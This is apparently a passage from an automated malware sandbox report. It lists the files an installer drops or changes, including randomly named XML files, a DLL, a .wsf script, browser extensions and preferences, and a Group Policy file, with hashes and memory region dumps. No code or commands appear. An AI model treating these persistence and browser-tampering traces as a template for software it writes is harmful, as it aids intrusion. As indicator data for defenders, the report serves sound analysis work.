                                                                                                                  5d933e65b27b14569d8214770e3a6f48474ee78dd8d1a8a9bf7c849bef81b3bb7db18f6e692453006f1cd493fbd904e16b16012c982bc7087f106990beec9e63

                                                                                                                • C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\lcMYsPx.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  2ff0e0e4222516a54a15dad67c2624c3

                                                                                                                  SHA1

                                                                                                                  b0d79c71f95b6655c28e999b0e93a43161be3868

                                                                                                                  SHA256

                                                                                                                  175a294bc9d0ae23758881866cfedd1745fd0784cb9b46e48601d8570388e011

                                                                                                                  SHA512

                                                                                                                  b3e9e7f338654946a4472d2daecbe879a482dacb45f0340726098ab504a58c8ab5609a6a0ef9b38fba3a5eeb875ae9af8f9454f1b5dc48f524e8f3a9c2932757

                                                                                                                • C:\Program Files (x86)\fRaJVJSWwewU2\RIaccDa.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  a1fa92cf30d137fc3659d1161e8c4666

                                                                                                                  SHA1

                                                                                                                  653a7f8b05cbad20a851e7bacbc5e9eddd3dcd7f

                                                                                                                  SHA256

                                                                                                                  0586db598a7ced737d7acd60e42ca49086d7f0eb5d88ad1f5a26a1122cb10dbd

                                                                                                                  SHA512

                                                                                                                  8b4868a6b5559ae48dc289b6b3705cd132ce738a0516023a1736904268cf91a95b2f35917b287386fc83c1a97b32c2a8e1c4c5fd84b4a0b56e93d6c1bddf63b4

                                                                                                                • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                  MD5

                                                                                                                  b06848411cf44859d829aba78e3d8717

                                                                                                                  SHA1

                                                                                                                  6419a74a3883491ec60a08d829b9688c4bef98c0

                                                                                                                  SHA256

                                                                                                                  278aa55d3254d2bf005f2cd4e0713a67582df384637bed933f4d08fed6ce25aa

                                                                                                                  SHA512

                                                                                                                  c4798a36a57c7baf7d90d2e7531f040066716c96f501d51cbe389f250e037b40ba8d5ea983b2e44d13f2eca9a3aeb3efb4e82ba57c1d299c29381ecc1582ac7d

                                                                                                                • C:\ProgramData\wTVsRuZmkGlUMZVB\yhVEBLJ.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  c3f7d9dead530efb71a763146ba79bd1

                                                                                                                  SHA1

                                                                                                                  adbb140b3f70fbd36b239d1a23b11b1ab7ca698e

                                                                                                                  SHA256

                                                                                                                  e885a243ecbbb00a1be349a9276b9c6d5523e3ad6238108bd1eb332576a5d071

                                                                                                                  SHA512

                                                                                                                  e1ccacfcb8eb11c7230a0beb8ebd0bd0da39087f3cb84f79008464a23a7645b5cd4a9808eb015e20841ee553c8430c7080bd7326438deb1ba03ea341d3eb9965

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                  Filesize

                                                                                                                  187B

                                                                                                                  MD5

                                                                                                                  2a1e12a4811892d95962998e184399d8

                                                                                                                  SHA1

                                                                                                                  55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                  SHA256

                                                                                                                  32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                  SHA512

                                                                                                                  bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                  Filesize

                                                                                                                  136B

                                                                                                                  MD5

                                                                                                                  238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                  SHA1

                                                                                                                  0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                  SHA256

                                                                                                                  801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                  SHA512

                                                                                                                  2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                  Filesize

                                                                                                                  150B

                                                                                                                  MD5

                                                                                                                  0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                  SHA1

                                                                                                                  6a51537cef82143d3d768759b21598542d683904

                                                                                                                  SHA256

                                                                                                                  0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                  SHA512

                                                                                                                  5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

                                                                                                                  45d8363739e97f5d3c6516e31e5e01b7

                                                                                                                  SHA1

                                                                                                                  a218098358c81a7de771193e07990b9fb7949c40

                                                                                                                  SHA256

                                                                                                                  39a352b0ab765f30a46670277671d9da5bb51ca1eb23c5aa8d02748a56c9bd5c

                                                                                                                  SHA512

                                                                                                                  33725417d26a4f111f5e09e7ab01eea7405e63d2d896ab12db9e06ea7bfd1369e829f38dd9f6c08008f1d844fcb02825d185f64c067ecfec3e661e999f65b791

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS6FC3.tmp\Install.exe

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                  MD5

                                                                                                                  b6d0df0f684085e0dedc75a13d097ff9

                                                                                                                  SHA1

                                                                                                                  e2a22ebb265d25d122f994c1d8067c6346a48cb3

                                                                                                                  SHA256

                                                                                                                  2581331982d9d220323f43c2ab7d5c403b8d8747b84adace951abe2760e1fb3f

                                                                                                                  SHA512

                                                                                                                  c4ef41f9936418a6178040b4b76a077a9bcd70bd3f8f67048e9e5726d5e6ce4a790d0117c39278ed39d670dc9712fb74b77fc31e10ce7e5098b14b218369cbf4

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  4f9274673114cee7bf9a7fa98385ce5c

                                                                                                                  SHA1

                                                                                                                  35560e1cd4b9f52b1fcc27a7e8e31a2efcbe8cc8

                                                                                                                  SHA256

                                                                                                                  44f7efd066fd1a43d0bae3e8cc4f474f670d5e0d7689b4575e84f339c44068a2

                                                                                                                  SHA512

                                                                                                                  4c03547fada4b10ce89f92f886c83870e8aaebcaae0c67e77d20d86629bb522999aa38b5f1906105daeedf38d8dd9231c920d7467d98b378896c716d856ba585

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  844c414a330b644f50607ee6f3d83ab5

                                                                                                                  SHA1

                                                                                                                  e13019cb62e9564c9a86dc15c7516bf180f4e3d0

                                                                                                                  SHA256

                                                                                                                  e8558fd8f1d7a6bb33c6a03b2efdcbb535c664325e7a85192e3bb81837c833ef

                                                                                                                  SHA512

                                                                                                                  56f4d7af4b6b2c73f34d14a2f566c226f12f333e17d5a40af76545d57a7b5ce23c12d40c4450edb77640160157cdd78879a7e100eca473309af019ce2f34ac16

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HXRYHLJQK7L2LQABJJHZ.temp

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  a5eb9f5f891d78311395989d6e91fbad

                                                                                                                  SHA1

                                                                                                                  d2a83da162d56e232f74bc70b8cc664da8e67b97

                                                                                                                  SHA256

                                                                                                                  7ef1f2e9c702b0e166a3c5e9bd320d607c9cf863834e5502b803f6177c86b1b9

                                                                                                                  SHA512

                                                                                                                  7b4d518d897e713719cca57bef49980ba5385453ee6feeebbeaaa45652d4b9606d0500b6aad2198054ce9a2c3b4ded3265581868f6f84dd921c74de6d3c01b7b

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sexvjvzg.default-release\prefs.js

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  f0bb5b225cc15eff3ab2a5787f5da98b

                                                                                                                  SHA1

                                                                                                                  46ab23d017a72385284f3e85dd4942bbc63041a7

                                                                                                                  SHA256

                                                                                                                  8b91e9cac0569f284c50a64b571efdaaac24e5ca0879d1059e2f945c98113a9d

                                                                                                                  SHA512

                                                                                                                  597a7074b9fa9405518ca9cf2b2446d2f1ed47e079147c58977be7c259ee676c64b31f2c9d5fb2940c24be29f7a2154f0e2fe1a55fc1bed4134a2d03f3399eb5

                                                                                                                • C:\Windows\Temp\yryKlDDJVLpCRzjJ\mmwzQPhm\sdNCLes.dll

                                                                                                                  Filesize

                                                                                                                  6.4MB

                                                                                                                  MD5

                                                                                                                  8d16a2a3ae1fd8f75be7572060ed249b

                                                                                                                  SHA1

                                                                                                                  d07eaf58f3724f685033f0e53327bd9e4d2e4a82

                                                                                                                  SHA256

                                                                                                                  cd3031259051eccd160b5d2d427ce9ca9bc41ce3b1e85b043b2c8c63d12c499a

                                                                                                                  SHA512

                                                                                                                  a719ebc6b7e05dee9e2992f6dcee92c392125d6785327e1fa068d6de0ca8af8da632c00585ec2112144d1c2ba87226911c3c6459ccdd3e3865307db814c61e7b

                                                                                                                • C:\Windows\Temp\yryKlDDJVLpCRzjJ\tyBRSUfG\BMfsKzRuFjcKcQJc.wsf

                                                                                                                  Filesize

                                                                                                                  9KB

                                                                                                                  MD5

                                                                                                                  0c377387cc2856ff01221c6f061c57e1

                                                                                                                  SHA1

                                                                                                                  7d3e1d69d08d136dd3e2ddb01843f3148ec23e3f

                                                                                                                  SHA256

                                                                                                                  4523d356eda68dfaacf2cba4f641f13025e8f4ec6657561fe6b30eac9680c654

                                                                                                                  SHA512

                                                                                                                  f5d8a5a98339f8826862ef6a6ccea6a15e32e1177eb735487cabe45593e85faaee8f0a07cd9344067a675e66c053474441fa8ae4cd3f3797a6a8a77634888199

                                                                                                                • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                  Filesize

                                                                                                                  6KB

                                                                                                                  MD5

                                                                                                                  138417c0459e573527f3a6ab4281cccb

                                                                                                                  SHA1

                                                                                                                  26dea9de6c4801112ac7ab0e4c99d16dc5d24532

                                                                                                                  SHA256

                                                                                                                  d85876556e79fbf2ce181dbd1e9ecb0fc9eb697686bb84556119425ecd7646ed

                                                                                                                  SHA512

                                                                                                                  c4908d25981e948a174074c47e5534df7e924ffc72adb26bc371a913a6dc2745dff8023df0097ae25934e8ad66a3a3b71c7e9380f360caf27392e3bd99a04a54

                                                                                                                • \Users\Admin\AppData\Local\Temp\7zS6DFF.tmp\Install.exe

                                                                                                                  Filesize

                                                                                                                  6.4MB

                                                                                                                  MD5

                                                                                                                  a70c1771e798b6c0cb1ad5d46232bf0a

                                                                                                                  SHA1

                                                                                                                  7dea8f0ca6614d1220f6ac5dbe7fb0aaeb28c940

                                                                                                                  SHA256

                                                                                                                  a6841daa03e2551b72f2429b2d21be11ed1955edea78be5af90b999fd297f483

                                                                                                                  SHA512

                                                                                                                  9b2009c3a29612c12f7a04af9a09bcbe0bcd92a1b422ea7480d3fcd10e18a27f2b367ce5fa84f3bb4c75491ca1edf295f08f4e9d0dfac1af98b7a66743b4a75a

                                                                                                                • memory/1516-58-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  2.9MB

                                                                                                                • memory/1516-59-0x0000000001E20000-0x0000000001E28000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/1912-103-0x0000000001820000-0x00000000018A5000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  532KB

                                                                                                                • memory/1912-136-0x0000000001350000-0x00000000013B0000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  384KB

                                                                                                                • memory/1912-384-0x0000000000A40000-0x00000000010FA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1912-319-0x0000000002FC0000-0x0000000003047000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  540KB

                                                                                                                • memory/1912-89-0x0000000000A40000-0x00000000010FA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1912-333-0x0000000003A00000-0x0000000003ACD000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  820KB

                                                                                                                • memory/1912-91-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  5.8MB

                                                                                                                • memory/2348-81-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  2.9MB

                                                                                                                • memory/2752-352-0x0000000001690000-0x0000000001C61000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  5.8MB

                                                                                                                • memory/2780-69-0x0000000002310000-0x0000000002318000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/2780-68-0x000000001B5A0000-0x000000001B882000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  2.9MB

                                                                                                                • memory/2900-23-0x00000000009B0000-0x000000000106A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-25-0x00000000011F0000-0x00000000018AA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-42-0x00000000011F0000-0x00000000018AA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-41-0x00000000009B0000-0x000000000106A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-43-0x00000000011F0000-0x00000000018AA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-29-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  5.8MB

                                                                                                                • memory/2900-44-0x00000000011F0000-0x00000000018AA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-24-0x00000000011F0000-0x00000000018AA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2900-26-0x00000000011F0000-0x00000000018AA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/3012-40-0x0000000002340000-0x00000000029FA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/3012-22-0x0000000002340000-0x00000000029FA000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/3016-90-0x0000000000F60000-0x000000000161A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/3016-47-0x0000000000F60000-0x000000000161A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/3016-48-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  5.8MB

                                                                                                                • memory/3016-70-0x0000000000F60000-0x000000000161A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB